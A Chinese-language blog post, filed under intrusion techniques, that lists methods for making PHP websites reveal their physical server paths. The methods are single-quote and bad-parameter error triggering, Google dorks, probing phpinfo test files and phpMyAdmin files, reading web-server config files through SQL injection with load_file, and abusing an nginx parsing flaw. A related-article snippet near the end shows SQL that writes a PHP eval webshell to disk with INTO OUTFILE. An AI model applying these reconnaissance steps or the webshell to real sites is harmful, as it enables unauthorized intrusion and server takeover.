php爆路径方法总结

最新推荐文章于 2023-07-19 10:22:21 发布
最新推荐文章于 2023-07-19 10:22:21 发布
阅读量1.4k 收藏
点赞数
分类专栏: 入侵技术

1、单引号爆路径

  直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。

  www.xxxx.com /news.php?id=149′

  2、错误参数值爆路径

  将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。

  www.xxxx.com /researcharchive.php?id=-1

  3、Google爆路径

  结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。

  Site:xxxx.com warning

  Site:xxxx.com “fatal error”

  4、测试文件爆路径

  很多网站的根目录下都存在测试文件,脚本代码通常都是phpinfo()。

  www.xxxx.com /test.php

  www.xxxx.com /ceshi.php

  www.xxxx.com /info.php

  www.xxxx.com phpinfo.php

  www.xxxx.com /php_info.php

  www.xxxx.com /1.php

  5、phpmyadmin爆路径

  一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。至于phpmyadmin的地址可以用wwwscan这类的工具去扫,也可以选择google。PS:有些BT网站会写成phpMyAdmin。

  www.xxxx.com /phpmyadmin/themes/darkblue_orange/layout.inc.php

  www.xxxx.com /phpmyadmin/libraries/select_lang.lib.php

  www.xxxx.com /phpmyadmin/index.php?lang[]=1

  6、配置文件找路径

  如果注入点有文件读取权限,就可以手工load_file或工具读取配置文件,再从中寻找路径信息(一般在文件末尾)。各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。

  Windows:

  c:\windows\php.ini php配置文件

  c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件

  Linux:

  /etc/php.ini php配置文件

  /etc/httpd/conf.d/php.conf

  /etc/httpd/conf/httpd.conf Apache配置文件

  /usr/local/apache/conf/httpd.conf

  /usr/local/apache2/conf/httpd.conf

  /usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件

  7、nginx文件类型错误解析爆路径

  这是昨天无意中发现的方法,当然要求Web服务器是nginx,且存在文件类型解析漏洞。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。

  www.xxxx.com /top.jpg/x.php

  8、其他

  其他就是像dedecms、phpwind之类的整站程序爆路径漏洞,比较杂,通用性不强。

寂寞老酒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php zend 相对路径问题
10-30
php下使用zend相对路径的处理方法
PHP绝对路径方法收集
07-24
PHP绝对路径方法收集,可以学习一下啊,比较全面了
PHP绝对路径方法
Azjj
10-06 1055
1、单引号路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=149′ 2、错误参数值路径 说明: 将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。 www.xxx.com/researcharchive.php?id=-1 3、Google路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点
php网站 绝对路径小结 - cracer_CSDN
m0_67888657的博客
07-12 245
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能出物理路径。解决方法其实也很简单,既然我们不能减慢目标网站的速度,那我们就想办法减慢自己的速度,这样达到的效果是一样的。也很简单,只要我们找一个速度极慢的代理,挂上以后再上目标网站,就有可能将绝对路径出来。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能出物理路径。将要提交的参数值改成错误值,比如-1。
php绝对路径的几种方法
weixin_30755709的博客
03-27 230
WordPress的平台,绝对路径方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.phpphpMyA...
php路径破,当Windows遇上PHP路径
weixin_39853131的博客
04-09 158
1.开场白此次所披露的是以下网页中提出的问题所取得的测试结果:http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
PHP网站物理路径
kai_saaaa的博客
04-05 487
1、报错显示 可以在url后面加一个单引号(这个要看管理员有没有把display_errors打开哦,打开才能报错显示) 2、使用搜索引擎 a.弄清楚他是什么cms 比如我知道那个网站是织梦的,我们就可以这样 b.site:www.xxx.com warning 3、测试文件路径 常见的 www.xxx.com/test.php www.xxx.com/info.php www.xxx.co...
php后台拿shell要知道php路径,文章下将讲诉php路径方法
野路子云遇见不同的自己
07-19 412
' INTO OUTFILE 'E:/xamp/www/xiaoma.php'----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php。/usr/local/apache/conf/extra/httpd-vhosts.conf 虚拟目录配置文件。读取文件内容: select load_file('E:/xamp/www/s.php');
PHP绝对路径方法收集贴
dibodang1423的博客
06-15 429
1、单引号路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxx.com/news.php?id=149′ 2、错误参数值路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxx.com/researcharchive.php?id=-1 3、Go...
phpmyadmin后台4种拿shell方法php路径收集
weixin_30367873的博客
08-31 1195
php后台拿shell要知道php路径,文章下将讲诉php路径方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
php路径方法.txt
07-18
php路径方法
PHP绝对路径方法收集整理
12-19
1、单引号路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxx.com/news.php?id=149′ 2、错误参数值路径 说明: 将要提交的参数值改成错误值,比如-1。...
PHP获取文件相对路径方法
10-24
主要介绍了PHP获取文件相对路径方法,通过自定义函数实现获取文件相对路径的功能,具有一定参考借鉴价值,需要的朋友可以参考下
php相对路径解决方法
01-11
php相对路径 解决方法 php php相对路径 解决方法 php php相对路径 解决方法 php
c语言涂格子游戏源码.rar
04-22
c语言涂格子游戏源码.rar
node-v18.14.2-linux-armv7l.tar.xz
最新发布
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
C++ 实现全连接神经网络及矩阵头文件 及技术指导
04-22
矩阵头文件
node-v14.7.0-darwin-x64.tar.xz
04-22
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
PHP绝对路径方法?
06-03
PHP 中,可以使用 `__FILE__` 常量来获取当前...这种方法中,`realpath()` 函数用于获取当前脚本的绝对路径,`dirname()` 函数用于获取当前脚本所在目录的绝对路径。然后可以根据具体需求拼接出所需文件的绝对路径

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值